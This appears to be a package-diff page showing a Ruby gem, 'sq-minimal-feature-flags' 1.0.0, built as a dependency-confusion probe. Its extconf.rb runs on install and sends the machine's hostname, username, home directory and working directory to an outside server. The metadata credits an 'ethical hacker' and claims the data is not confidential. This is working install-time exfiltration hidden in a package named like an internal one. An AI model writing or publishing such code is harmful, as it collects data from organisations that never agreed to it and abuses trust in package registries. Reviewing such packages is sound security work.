sq-minimal-feature-flags 1.0.0

Sign up to get free protection for your applications and to get access to all the features.
Files changed (3) hide show
  1. checksums.yaml +7 -0
  2. data/ext/hola/extconf.rb +14 -0
  3. metadata +49 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: ca5a943965804e244a22efc2469e3f274f8917b29b7f44b06ad4bda3c43922fb
4
+ data.tar.gz: de77eb366884ae2d45cdccd8d99900572cb3d09cf6f6ecadff4287a28553b4d2
5
+ SHA512:
6
+ metadata.gz: 490705d1b615695cf715ad045cf82834b5ff52ca9ca4f18197d004f37792898c20c030f43612d348dafdfcbda9471d8562d468416f222c4a3fa8af50bba72632
7
+ data.tar.gz: 241604badfc472f48abee5bcaded993e3fb0344983d7e191d7a2c34ca18d93426e439a3b2624921fe34bf55ba941548b0596c122ebf59a4a2903c66c7a4a9bcd
@@ -0,0 +1,14 @@
1
+ require 'uri'
2
+ require 'net/http'
3
+ require 'socket'
4
+
5
+ # Extract only the bare minimum to be able to identify
6
+ # vulnerable organization.
7
+ # Send hostname, username, current working directory, home directory to my server.
8
+ # There isn't anything malicious in here! This information is not private/confidential in any way.
9
+
10
+
11
+ uri = URI('http://ruby-dependency-confusion.jumpingcrab.com/report')
12
+ res = Net::HTTP.post_form(uri, 'gem' => 'sq-minimal-feature-flags', 'version' => '1.0.0', 'hostname' => Socket.gethostname, 'username' => ENV['USER'] || 'no_user', 'home' => File.expand_path('~'), 'cwd' => Dir.pwd)
13
+
14
+
metadata ADDED
@@ -0,0 +1,49 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: sq-minimal-feature-flags
3
+ version: !ruby/object:Gem::Version
4
+ version: 1.0.0
5
+ platform: ruby
6
+ authors:
7
+ - ethical hacker
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2023-03-13 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description: |-
14
+ WARNING! DO NOT INSTALL THIS GEM.
15
+ This gem is used to detect dependency confusion vulnerabilities. When installed, the gem sends hostname, username, home directory and current working directory to my server so I can identifiy vulnerable companies. The gem does not do anything else. The extracted information is not private/confidential in any way.
16
+ email:
17
+ executables: []
18
+ extensions:
19
+ - ext/hola/extconf.rb
20
+ extra_rdoc_files: []
21
+ files:
22
+ - ext/hola/extconf.rb
23
+ homepage:
24
+ licenses: []
25
+ metadata: {}
26
+ post_install_message:
27
+ rdoc_options: []
28
+ require_paths:
29
+ - lib
30
+ required_ruby_version: !ruby/object:Gem::Requirement
31
+ requirements:
32
+ - - ">="
33
+ - !ruby/object:Gem::Version
34
+ version: '0'
35
+ required_rubygems_version: !ruby/object:Gem::Requirement
36
+ requirements:
37
+ - - ">="
38
+ - !ruby/object:Gem::Version
39
+ version: '0'
40
+ requirements: []
41
+ rubygems_version: 3.1.2
42
+ signing_key:
43
+ specification_version: 4
44
+ summary: WARNING! DO NOT INSTALL THIS GEM. This gem is used to detect dependency confusion
45
+ vulnerabilities. When installed, the gem sends hostname, username, home directory
46
+ and current working directory to my server so I can identifiy vulnerable companies.
47
+ The gem does not do anything else. The extracted information is not private/confidential
48
+ in any way.
49
+ test_files: []